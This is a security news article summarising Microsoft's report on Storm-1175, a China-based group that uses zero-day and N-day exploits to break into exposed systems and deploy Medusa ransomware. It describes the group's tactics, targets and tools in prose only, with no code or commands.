China-based threat actors known for deploying Medusa ransomware are said to be involved in weaponizing a combination of zero-day and N-day vulnerabilities to orchestrate “high-velocity” attacks and compromise vulnerable internet-connected systems.
The Microsoft Threat Intelligence team said, “Due to the attackers’ high operational tempo and proficiency in identifying exposed perimeter assets, recent intrusions have had a significant impact on healthcare organizations as well as the education, professional services, and financial sectors in Australia, the United Kingdom, and the United States.”
Storm-1175 attacks leverage recently published vulnerabilities and, in some cases, pre-public zero-day exploits to gain initial access. Some incidents include attackers chaining together multiple exploits (such as OWASSRF) for post-compromise activity.
Once financially motivated cybercriminals gain a foothold, they move quickly to steal data and deploy Medusa ransomware within days, or in some incidents, within 24 hours.
To aid in these efforts, the group creates persistence by creating new user accounts, deploying web shells or legitimate remote monitoring and management (RMM) software for lateral movement, performing credential theft, and disrupting the normal functioning of security solutions before dropping ransomware.
Storm-1175 is believed to be associated with over 16 vulnerability exploits since 2023.
CVE-2025-10035 and CVE-2026-23760 are both said to have been exploited as zero-days before being released to the public. As of late 2024, the hacking team has demonstrated a talent for targeting Linux systems, including exploiting vulnerable Oracle WebLogic instances across multiple organizations. However, the exact vulnerabilities weaponized in these attacks are still unknown.
“Storm-1175 takes advantage of a period when many organizations are unprotected to rapidly rotate exploits between publication and patch availability or adoption,” Microsoft said.
Some of the notable tactics observed in these attacks are:
Using resident binaries (LOLBins) such as PowerShell and PsExec and Impacket for lateral movement. Relies on PDQ Deployer for both lateral movement across the network and payload delivery (such as Medusa ransomware). Modify Windows Firewall policy to enable Remote Desktop Protocol (RDP) to deliver malicious payloads to other devices. Perform a credential dump using Impacket and Mimikatz. Configure Microsoft Defender Antivirus exclusions to avoid blocking ransomware payloads. Bandizip and Rclone are used for data collection and extraction, respectively.
The larger implication here is that RMM tools such as AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect, and SimpleHelp are becoming dual-use infrastructure for covert operations, as threat actors can mix malicious traffic into a trusted, encrypted platform to reduce the likelihood of detection.
Source link
